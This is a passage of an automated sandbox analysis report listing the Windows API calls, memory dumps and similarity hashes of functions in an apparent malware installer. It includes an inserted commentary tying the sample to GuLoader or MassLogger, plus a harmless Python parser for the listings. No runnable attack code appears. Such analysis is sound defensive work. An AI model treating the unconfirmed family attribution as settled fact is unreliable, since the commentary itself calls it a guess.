• SetWindowTextW.USER32(?,?), ref: 00402CE1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
• Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
APIs
• GetTickCount.KERNEL32 ref: 00403192
  • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
• SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
• WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
• SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: File$Pointer$CountTickWrite
• String ID: x>A
• API String ID: 2146148272-3854404225
• Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
• Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
• Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
• Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061E1
• CharNextW.USER32(?,?,?,00000000), ref: 004061F0
• CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061F5
• CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 00406208
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
• Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
• Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
• Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
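The entries above are the raw per-function output of the sandbox's IDA plugin for the image mapped at 0x400000 in process 3: one block per function, each listing the imports it calls (with the call-site address after `ref:`), the calls made through its subcalls, the memory dump the code came from, and the similarity keys. Read together they describe a small GUI-driven file reader/writer with progress text (`verifying installer: %d%%`, `unpacking data: %d%%`) and a filename sanitiser built on `CharNextW`/`CharPrevW` with the illegal character set `*?|<>/":`; those strings and that character set are the ones used by the NSIS installer stub, so this region is most likely the installer wrapper rather than the GuLoader or MassLogger payload. That attribution is mine, not the report's. To triage a listing like this in bulk it helps to parse it rather than read it, so the following Python is an added example (not part of the report or of Joe Sandbox's tooling). It assumes the line layout shown on this page, carries `API ID`/`Opcode ID` through as opaque strings without reproducing how the sandbox derives them, and embeds as constructed input a trimmed copy of two of the entries above (argument lists shortened, hash lines omitted).

```python
"""Parse Joe Sandbox per-function API listings into records for triage.

Added example, not part of the sandbox report or of Joe Sandbox's tooling.
Assumed line layout (as seen on this page):
    • Name.MODULE(arg,arg,...), ref: ADDR
    • Name.MODULE ref: ADDR                       (no argument list)
      • Part of subcall function ADDR: Name.MODULE(...), ref: ADDR
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two entries trimmed from the listing on this page
# (argument lists shortened, hash lines other than Opcode ID omitted).
SAMPLE = """\
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
• SetFilePointer.KERNEL32(?,?,?,00000001), ref: 00402639
  • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000), ref: 00405BED
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$ByteCharMultiReadWide$Pointerwsprintf
• String ID: 9
• Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00434000), ref: 004061E1
• CharPrevW.USER32(?,?,00436800), ref: 00406208
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # call-site address
    caller: Optional[int] = None  # subcall entry point when the call is indirect


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""
    source: str = ""              # memory dump the code was lifted from

    def api_names(self) -> List[str]:
        return sorted({c.name for c in self.calls})

    def address_range(self) -> Optional[Tuple[int, int]]:
        """Span of this function's own call sites; subcall sites live elsewhere."""
        refs = [c.ref for c in self.calls if c.caller is None]
        return (min(refs), max(refs)) if refs else None


def parse_listing(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":                   # each entry opens with its API list
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if not m:
                raise ValueError(f"unrecognised API line: {body!r}")
            args = m["args"].split(",") if m["args"] is not None else []
            caller = int(m["caller"], 16) if m["caller"] else None
            current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            current.source = body.split(":", 1)[1].split(",", 1)[0].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            value = value.strip()
            if key == "API ID":
                current.api_id = value
            elif key == "String ID":           # '$' separates multiple strings
                current.strings = value.split("$") if value else []
            elif key == "Opcode ID":
                current.opcode_id = value
    return records


def api_histogram(records: List[FunctionRecord]) -> Counter:
    """Count (module, api) over direct calls only: subcall entries are repeated
    under every caller and would otherwise be counted once per caller."""
    return Counter((c.module, c.name) for r in records for c in r.calls if c.caller is None)


def functions_calling(records: List[FunctionRecord], api: str) -> List[FunctionRecord]:
    return [r for r in records if any(c.name == api for c in r.calls)]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for r in recs:
        lo, hi = r.address_range()
        print(f"{lo:08X}-{hi:08X} {r.api_names()} strings={r.strings}")
    print(api_histogram(recs).most_common())
```

Running it over a full export of the listing gives a per-function import table keyed by address, which is the quickest way to separate the installer-stub functions (file copy, dialog text, filename checks) from anything worth opening in a disassembler; the `WriteFile` callers and any function whose strings are not the stock installer messages are the ones to look at first.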
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                            • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                            • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 1453599865-4194326291
                                                                                                            • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                            • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                            • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                            • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                            • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                            • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                            • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                            • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                            • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                            • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                            • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                            • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                            • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                            • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                            • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                            • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$PointerWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 539440098-3854404225
                                                                                                            • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                            • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                            • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                            • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                            • wsprintfW.USER32 ref: 00404A12
                                                                                                            • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                            • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                            • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                            • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                            • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                            • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356686001-0
                                                                                                            • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                            • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                            • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                            • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,774D2EE0,00405792,?,00436800,774D2EE0,00434000), ref: 004059EE
